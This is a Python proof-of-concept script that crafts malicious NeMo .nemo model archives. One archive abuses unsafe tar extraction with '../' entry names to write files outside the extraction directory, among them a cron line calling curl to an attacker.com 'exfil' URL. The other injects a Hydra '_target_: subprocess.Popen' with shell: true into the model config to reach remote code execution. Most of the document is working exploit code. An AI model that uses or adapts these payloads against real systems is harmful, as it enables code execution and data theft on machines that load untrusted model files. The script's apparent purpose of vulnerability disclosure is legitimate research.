| """
|
| PoC: NeMo Path Traversal + Hydra _target_ Injection
|
| =====================================================
|
| Crafts malicious .nemo files demonstrating two vulnerabilities:
|
|
|
| 1. Path Traversal: tar.extract() in model_utils.py without _safe_extract()
|
| 2. Hydra Injection: _target_ field in config instantiates arbitrary classes
|
|
|
| Usage:
|
| python craft_malicious_nemo.py # Generate both PoCs
|
| python craft_malicious_nemo.py --type traversal # Path traversal only
|
| python craft_malicious_nemo.py --type hydra # Hydra injection only
|
| python craft_malicious_nemo.py --verify # Show archive contents
|
|
|
| This is for authorized security research only.
|
| """
|
|
|
| import tarfile
|
| import io
|
| import os
|
| import argparse
|
|
|
|
|
| def craft_path_traversal_nemo(output_path="path_traversal.nemo"):
|
| """
|
| Create a .nemo file with path traversal in tar entry names.
|
|
|
| When model_utils.load_config() or save_artifacts() processes this file,
|
| tar.extract() writes files outside the intended directory because
|
| _safe_extract() is NOT used in model_utils.py (only in save_restore_connector.py).
|
| """
|
|
|
| with tarfile.open(output_path, "w:") as tar:
|
|
|
| config_content = b"""model:
|
| name: poc_path_traversal
|
| target: nemo_test
|
| class_path: nemo.collections.asr.models.EncDecCTCModel
|
| """
|
| config_info = tarfile.TarInfo(name="model_config.yaml")
|
| config_info.size = len(config_content)
|
| tar.addfile(config_info, io.BytesIO(config_content))
|
|
|
|
|
|
|
|
|
|
|
|
|
| payload = b"PATH_TRAVERSAL_SUCCESSFUL - written outside extraction dir\n"
|
|
|
|
|
| traversal_info = tarfile.TarInfo(name="../../../../tmp/nemo_poc_escaped.txt")
|
| traversal_info.size = len(payload)
|
| tar.addfile(traversal_info, io.BytesIO(payload))
|
|
|
|
|
| payload2 = b"# Malicious cron job\n* * * * * curl http://attacker.com/exfil\n"
|
| traversal_info2 = tarfile.TarInfo(name="../../../../tmp/nemo_poc_cron")
|
| traversal_info2.size = len(payload2)
|
| tar.addfile(traversal_info2, io.BytesIO(payload2))
|
|
|
| file_size = os.path.getsize(output_path)
|
| print(f"[+] Path traversal .nemo written to: {output_path}")
|
| print(f" Size: {file_size} bytes")
|
| print()
|
| print(" Tar contents:")
|
| with tarfile.open(output_path, "r:") as tar:
|
| for member in tar.getmembers():
|
| escape = " <-- PATH TRAVERSAL" if ".." in member.name else ""
|
| print(f" {member.name}{escape}")
|
| print()
|
| print("[!] When loaded by nemo.utils.model_utils.load_config():")
|
| print(" tar.extract() has NO path validation (_safe_extract not used)")
|
| print(" Files are written outside the temp extraction directory")
|
| return output_path
|
|
|
|
|
| def craft_hydra_injection_nemo(output_path="hydra_injection.nemo"):
|
| """
|
| Create a .nemo file with Hydra _target_ injection in config.
|
|
|
| When setup_optimization() processes this config, it calls
|
| hydra.utils.instantiate() with the attacker-controlled _target_,
|
| which can point to subprocess.Popen or any importable class.
|
| """
|
|
|
|
|
| config_content = b"""model:
|
| name: poc_hydra_injection
|
| target: nemo_test
|
| optim:
|
| _target_: subprocess.Popen
|
| args:
|
| - "echo HYDRA_TARGET_INJECTION_SUCCESSFUL"
|
| shell: true
|
| sched:
|
| name: CosineAnnealing
|
| warmup_steps: 100
|
| """
|
|
|
| with tarfile.open(output_path, "w:") as tar:
|
| config_info = tarfile.TarInfo(name="model_config.yaml")
|
| config_info.size = len(config_content)
|
| tar.addfile(config_info, io.BytesIO(config_content))
|
|
|
|
|
| weights = b"\x00" * 64
|
| weights_info = tarfile.TarInfo(name="model_weights.ckpt")
|
| weights_info.size = len(weights)
|
| tar.addfile(weights_info, io.BytesIO(weights))
|
|
|
| file_size = os.path.getsize(output_path)
|
| print(f"[+] Hydra injection .nemo written to: {output_path}")
|
| print(f" Size: {file_size} bytes")
|
| print()
|
| print(" Tar contents:")
|
| with tarfile.open(output_path, "r:") as tar:
|
| for member in tar.getmembers():
|
| print(f" {member.name}")
|
| print()
|
| print(" Malicious config excerpt:")
|
| print(" optim:")
|
| print(" _target_: subprocess.Popen <-- ARBITRARY CLASS INSTANTIATION")
|
| print(' args: ["echo HYDRA_TARGET_INJECTION_SUCCESSFUL"]')
|
| print(" shell: true")
|
| print()
|
| print("[!] When loaded by NeMo and setup_optimization() is called:")
|
| print(" hydra.utils.instantiate({_target_: 'subprocess.Popen', ...})")
|
| print(" -> Instantiates subprocess.Popen with attacker args -> RCE")
|
| return output_path
|
|
|
|
|
| def main():
|
| parser = argparse.ArgumentParser(description="NeMo PoC generator")
|
| parser.add_argument("--type", choices=["traversal", "hydra", "both"],
|
| default="both", help="Which PoC to generate")
|
| parser.add_argument("--verify", action="store_true",
|
| help="Show archive contents after generation")
|
| parser.add_argument("--output-dir", default=".", help="Output directory")
|
| args = parser.parse_args()
|
|
|
| paths = []
|
|
|
| if args.type in ("traversal", "both"):
|
| path = craft_path_traversal_nemo(
|
| os.path.join(args.output_dir, "path_traversal.nemo"))
|
| paths.append(path)
|
| print()
|
|
|
| if args.type in ("hydra", "both"):
|
| path = craft_hydra_injection_nemo(
|
| os.path.join(args.output_dir, "hydra_injection.nemo"))
|
| paths.append(path)
|
| print()
|
|
|
| if args.verify:
|
| for path in paths:
|
| print(f"=== Verifying {path} ===")
|
| with tarfile.open(path, "r:") as tar:
|
| for member in tar.getmembers():
|
| print(f" {member.name} ({member.size} bytes)")
|
| if member.name == "model_config.yaml":
|
| f = tar.extractfile(member)
|
| if f:
|
| print(f" Config preview:")
|
| for line in f.read().decode().split("\n")[:10]:
|
| print(f" {line}")
|
| print()
|
|
|
|
|
| if __name__ == "__main__":
|
| main()
|
|
|